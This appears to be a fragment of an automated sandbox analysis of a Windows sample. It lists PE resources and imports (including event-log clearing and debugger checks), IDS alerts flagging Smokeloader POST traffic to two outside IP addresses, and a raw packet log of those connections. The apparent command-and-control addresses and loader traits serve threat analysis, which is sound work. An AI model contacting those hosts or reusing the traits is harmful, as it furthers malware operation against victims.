                                                                            RT_ICON0x2735fe80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.4209016393442623
                                                                            RT_ICON0x27369700x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.46187943262411346
                                                                            RT_ICON0x2736e400xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.279317697228145
                                                                            RT_ICON0x2737ce80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.3664259927797834
                                                                            RT_ICON0x27385900x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.3773041474654378
                                                                            RT_ICON0x2738c580x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.3764450867052023
                                                                            RT_ICON0x27391c00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkishTurkey0.2587136929460581
                                                                            RT_ICON0x273b7680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.27345215759849906
                                                                            RT_ICON0x273c8100x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.28852459016393445
                                                                            RT_ICON0x273d1980x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.32180851063829785
                                                                            RT_STRING0x27426300xaadata0.5588235294117647
                                                                            RT_STRING0x27426e00x600data0.4361979166666667
                                                                            RT_STRING0x2742ce00x460data0.45
                                                                            RT_STRING0x27431400x64adata0.4360248447204969
                                                                            RT_STRING0x27437900x7b4data0.417342799188641
                                                                            RT_STRING0x2743f480x6d0data0.4294724770642202
                                                                            RT_STRING0x27446180x76cdata0.42526315789473684
                                                                            RT_STRING0x2744d880x606data0.4455252918287938
                                                                            RT_STRING0x27453900x7c2data0.42245720040281975
                                                                            RT_STRING0x2745b580x810data0.42102713178294576
                                                                            RT_STRING0x27463680x584data0.4461756373937677
                                                                            RT_STRING0x27468f00x74cdata0.4234475374732334
                                                                            RT_STRING0x27470400x710data0.4303097345132743
                                                                            RT_STRING0x27477500x5f6data0.4325032765399738
                                                                            RT_STRING0x2747d480x88data0.625
                                                                            RT_GROUP_CURSOR0x273fd500x22data1.0588235294117647
                                                                            RT_GROUP_CURSOR0x27424500x22data1.088235294117647
                                                                            RT_GROUP_ICON0x2732b480x76dataTurkishTurkey0.6694915254237288
                                                                            RT_GROUP_ICON0x273d6000x76dataTurkishTurkey0.6694915254237288
                                                                            RT_GROUP_ICON0x272c3100x76dataTurkishTurkey0.6610169491525424
                                                                            RT_GROUP_ICON0x2736dd80x68dataTurkishTurkey0.7211538461538461
                                                                            RT_VERSION0x27424780x1b4data0.5756880733944955
                                                                            DLLImport
                                                                            KERNEL32.dllOpenJobObjectA, ReadConsoleA, InterlockedDecrement, GlobalSize, SetDefaultCommConfigW, QueryDosDeviceA, GetComputerNameW, SetEvent, GetNumaAvailableMemoryNode, FreeEnvironmentStringsA, GetModuleHandleW, GetConsoleAliasesLengthA, SetCommState, GetConsoleWindow, ReadConsoleOutputW, GetVersionExW, GetStringTypeExW, HeapDestroy, GetFileAttributesA, DeleteVolumeMountPointA, DisconnectNamedPipe, LCMapStringA, GetLastError, GetProcAddress, MoveFileW, SetStdHandle, LoadLibraryA, InterlockedExchangeAdd, LocalAlloc, WritePrivateProfileStringA, GetModuleFileNameA, BuildCommDCBA, FatalAppExitA, GetShortPathNameW, SetCalendarInfoA, FindAtomW, SearchPathW, GetNumaProcessorNode, GetConsoleFontSize, PulseEvent, HeapAlloc, MultiByteToWideChar, Sleep, ExitProcess, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, WriteFile, GetStdHandle, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, SetFilePointer, GetConsoleCP, GetConsoleMode, FlushFileBuffers, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CloseHandle, CreateFileA
                                                                            GDI32.dllGetBoundsRect
                                                                            ADVAPI32.dllClearEventLogW
                                                                            Language of compilation systemCountry where language is spokenMap
                                                                            TurkishTurkey
                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2024-10-14T01:52:27.352704+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449736189.161.95.10380TCP
                                                                            2024-10-14T01:52:28.476787+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449737189.161.95.10380TCP
                                                                            2024-10-14T01:52:29.578063+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449738189.161.95.10380TCP
                                                                            2024-10-14T01:52:30.712318+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449739189.161.95.10380TCP
                                                                            2024-10-14T01:52:31.846797+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449740189.161.95.10380TCP
                                                                            2024-10-14T01:52:32.943368+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449741189.161.95.10380TCP
                                                                            2024-10-14T01:52:34.066205+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449742189.161.95.10380TCP
                                                                            2024-10-14T01:52:35.284563+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449743189.161.95.10380TCP
                                                                            2024-10-14T01:52:36.394921+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449744189.161.95.10380TCP
                                                                            2024-10-14T01:52:37.513650+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449745189.161.95.10380TCP
                                                                            2024-10-14T01:52:38.616273+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449746189.161.95.10380TCP
                                                                            2024-10-14T01:52:39.978543+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449747189.161.95.10380TCP
                                                                            2024-10-14T01:52:41.229308+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449748189.161.95.10380TCP
                                                                            2024-10-14T01:52:42.343624+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449749189.161.95.10380TCP
                                                                            2024-10-14T01:52:43.461849+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449750189.161.95.10380TCP
                                                                            2024-10-14T01:52:44.586287+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449751189.161.95.10380TCP
                                                                            2024-10-14T01:52:45.701213+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449752189.161.95.10380TCP
                                                                            2024-10-14T01:52:46.817207+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449753189.161.95.10380TCP
                                                                            2024-10-14T01:52:47.922152+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449754189.161.95.10380TCP
                                                                            2024-10-14T01:52:49.045985+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449755189.161.95.10380TCP
                                                                            2024-10-14T01:52:50.193029+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449756189.161.95.10380TCP
                                                                            2024-10-14T01:52:51.533325+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449757189.161.95.10380TCP
                                                                            2024-10-14T01:52:52.671964+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449758189.161.95.10380TCP
                                                                            2024-10-14T01:52:53.788983+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449759189.161.95.10380TCP
                                                                            2024-10-14T01:52:54.895988+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449760189.161.95.10380TCP
                                                                            2024-10-14T01:52:56.000150+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449761189.161.95.10380TCP
                                                                            2024-10-14T01:52:57.098914+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449762189.161.95.10380TCP
                                                                            2024-10-14T01:52:58.208548+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449763189.161.95.10380TCP
                                                                            2024-10-14T01:52:59.308215+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449766189.161.95.10380TCP
                                                                            2024-10-14T01:53:00.410405+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449772189.161.95.10380TCP
                                                                            2024-10-14T01:53:01.541617+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449783189.161.95.10380TCP
                                                                            2024-10-14T01:53:02.669552+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449789189.161.95.10380TCP
                                                                            2024-10-14T01:53:03.768388+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449797189.161.95.10380TCP
                                                                            2024-10-14T01:53:04.909931+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449806189.161.95.10380TCP
                                                                            2024-10-14T01:53:06.098599+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449812189.161.95.10380TCP
                                                                            2024-10-14T01:54:18.022227+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45003758.151.148.9080TCP
                                                                            2024-10-14T01:54:25.117522+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45003858.151.148.9080TCP
                                                                            2024-10-14T01:54:31.240510+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45003958.151.148.9080TCP
                                                                            2024-10-14T01:54:37.062971+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45004058.151.148.9080TCP
                                                                            2024-10-14T01:54:43.976866+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45004158.151.148.9080TCP
                                                                            2024-10-14T01:54:50.199292+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45004258.151.148.9080TCP
                                                                            2024-10-14T01:54:56.990013+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45004358.151.148.9080TCP
                                                                            2024-10-14T01:55:03.109844+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45004458.151.148.9080TCP
                                                                            2024-10-14T01:55:09.950050+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45004558.151.148.9080TCP
                                                                            2024-10-14T01:55:17.944120+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45004658.151.148.9080TCP
                                                                            2024-10-14T01:55:24.265967+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45004758.151.148.9080TCP
                                                                            2024-10-14T01:55:30.261756+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45004858.151.148.9080TCP
                                                                            2024-10-14T01:55:37.612387+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45004958.151.148.9080TCP
                                                                            2024-10-14T01:55:44.030057+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45005058.151.148.9080TCP
                                                                            2024-10-14T01:55:51.158024+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45005158.151.148.9080TCP
                                                                            2024-10-14T01:55:56.961550+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45005258.151.148.9080TCP
                                                                            2024-10-14T01:56:03.563735+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45005358.151.148.9080TCP
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Oct 14, 2024 01:52:26.250921965 CEST4973680192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:26.256372929 CEST8049736189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:26.256572008 CEST4973680192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:26.256912947 CEST4973680192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:26.256913900 CEST4973680192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:26.261977911 CEST8049736189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:26.262103081 CEST8049736189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:27.352427959 CEST8049736189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:27.352530003 CEST8049736189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:27.352704048 CEST4973680192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:27.354927063 CEST4973680192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:27.359307051 CEST4973780192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:27.360255003 CEST8049736189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:27.364826918 CEST8049737189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:27.364927053 CEST4973780192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:27.365040064 CEST4973780192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:27.365065098 CEST4973780192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:27.370734930 CEST8049737189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:27.370774984 CEST8049737189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:28.476666927 CEST8049737189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:28.476717949 CEST8049737189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:28.476787090 CEST4973780192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:28.477004051 CEST4973780192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:28.480262995 CEST4973880192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:28.482255936 CEST8049737189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:28.485543013 CEST8049738189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:28.485601902 CEST4973880192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:28.485728979 CEST4973880192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:28.485752106 CEST4973880192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:28.490801096 CEST8049738189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:28.490998030 CEST8049738189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:29.577939987 CEST8049738189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:29.577999115 CEST8049738189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:29.578063011 CEST4973880192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:29.578174114 CEST4973880192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:29.580718994 CEST4973980192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:29.583134890 CEST8049738189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:29.586182117 CEST8049739189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:29.586394072 CEST4973980192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:29.586394072 CEST4973980192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:29.586394072 CEST4973980192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:29.591716051 CEST8049739189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:29.591753006 CEST8049739189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:30.712194920 CEST8049739189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:30.712241888 CEST8049739189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:30.712317944 CEST4973980192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:30.712481022 CEST4973980192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:30.717324018 CEST8049739189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:30.735101938 CEST4974080192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:30.740581036 CEST8049740189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:30.742223024 CEST4974080192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:30.745536089 CEST4974080192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:30.746463060 CEST4974080192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:30.750751019 CEST8049740189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:30.751739025 CEST8049740189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:31.838764906 CEST8049740189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:31.845276117 CEST8049740189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:31.846796989 CEST4974080192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:31.846844912 CEST4974080192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:31.849359989 CEST4974180192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:31.851830006 CEST8049740189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:31.854748011 CEST8049741189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:31.855186939 CEST4974180192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:31.855186939 CEST4974180192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:31.855186939 CEST4974180192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:31.860682964 CEST8049741189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:31.860724926 CEST8049741189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:32.943216085 CEST8049741189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:32.943268061 CEST8049741189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:32.943367958 CEST4974180192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:32.943514109 CEST4974180192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:32.948695898 CEST8049741189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:32.949100971 CEST4974280192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:32.954121113 CEST8049742189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:32.954205036 CEST4974280192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:32.954488039 CEST4974280192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:32.954519987 CEST4974280192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:32.959379911 CEST8049742189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:32.959428072 CEST8049742189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:34.066059113 CEST8049742189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:34.066123009 CEST8049742189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:34.066205025 CEST4974280192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:34.066339016 CEST4974280192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:34.069298983 CEST4974380192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:34.072515011 CEST8049742189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:34.075131893 CEST8049743189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:34.075226068 CEST4974380192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:34.075334072 CEST4974380192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:34.075371981 CEST4974380192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:34.080177069 CEST8049743189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:34.080348015 CEST8049743189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:35.284312010 CEST8049743189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:35.284360886 CEST8049743189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:35.284392118 CEST8049743189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:35.284563065 CEST4974380192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:35.284563065 CEST4974380192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:35.284662962 CEST4974380192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:35.287475109 CEST4974480192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:35.289781094 CEST8049743189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:35.292458057 CEST8049744189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:35.292691946 CEST4974480192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:35.292782068 CEST4974480192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:35.292782068 CEST4974480192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:35.298104048 CEST8049744189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:35.298146009 CEST8049744189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:36.394654036 CEST8049744189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:36.394710064 CEST8049744189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:36.394921064 CEST4974480192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:36.395009041 CEST4974480192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:36.400366068 CEST8049744189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:36.402894020 CEST4974580192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:36.408277988 CEST8049745189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:36.408365011 CEST4974580192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:36.408469915 CEST4974580192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:36.408479929 CEST4974580192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:36.413924932 CEST8049745189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:36.414494038 CEST8049745189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:37.513359070 CEST8049745189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:37.513529062 CEST8049745189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:37.513649940 CEST4974580192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:37.513694048 CEST4974580192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:37.517194986 CEST4974680192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:37.519069910 CEST8049745189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:37.522562981 CEST8049746189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:37.522651911 CEST4974680192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:37.522823095 CEST4974680192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:37.522850037 CEST4974680192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:37.528199911 CEST8049746189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:37.528238058 CEST8049746189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:38.610548973 CEST8049746189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:38.616184950 CEST8049746189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:38.616272926 CEST4974680192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:38.616314888 CEST4974680192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:38.619465113 CEST4974780192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:38.621345043 CEST8049746189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:38.624767065 CEST8049747189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:38.624936104 CEST4974780192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:38.624982119 CEST4974780192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:38.624982119 CEST4974780192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:38.630229950 CEST8049747189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:38.630297899 CEST8049747189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:39.978420019 CEST8049747189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:39.978463888 CEST8049747189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:39.978492022 CEST8049747189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:39.978519917 CEST8049747189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:39.978543043 CEST4974780192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:39.978543997 CEST4974780192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:39.978631973 CEST4974780192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:39.982259989 CEST4974780192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:39.987247944 CEST8049747189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:40.118221998 CEST4974880192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:40.123629093 CEST8049748189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:40.123738050 CEST4974880192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:40.123960972 CEST4974880192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:40.124027014 CEST4974880192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:40.129326105 CEST8049748189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:40.129368067 CEST8049748189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:41.223464966 CEST8049748189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:41.229232073 CEST8049748189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:41.229307890 CEST4974880192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:41.229357004 CEST4974880192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:41.232445955 CEST4974980192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:41.234304905 CEST8049748189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:41.237320900 CEST8049749189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:41.237412930 CEST4974980192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:41.237576008 CEST4974980192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:41.237576008 CEST4974980192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:41.242463112 CEST8049749189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:41.242522001 CEST8049749189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:42.343538046 CEST8049749189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:42.343560934 CEST8049749189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:42.343624115 CEST4974980192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:42.343811989 CEST4974980192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:42.347002029 CEST4975080192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:42.348752022 CEST8049749189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:42.352205992 CEST8049750189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:42.352401018 CEST4975080192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:42.352502108 CEST4975080192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:42.352502108 CEST4975080192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:42.357500076 CEST8049750189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:42.357518911 CEST8049750189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:43.461736917 CEST8049750189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:43.461760044 CEST8049750189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:43.461848974 CEST4975080192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:43.468250036 CEST4975080192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:43.473495960 CEST8049750189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:43.482388973 CEST4975180192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:43.487654924 CEST8049751189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:43.487875938 CEST4975180192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:43.505342960 CEST4975180192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:43.505342960 CEST4975180192.168.2.4189.161.95.103
                                                                            Oct 14, 2024 01:52:43.510672092 CEST8049751189.161.95.103192.168.2.4
                                                                            Oct 14, 2024 01:52:43.511292934 CEST8049751189.161.95.103192.168.2.4
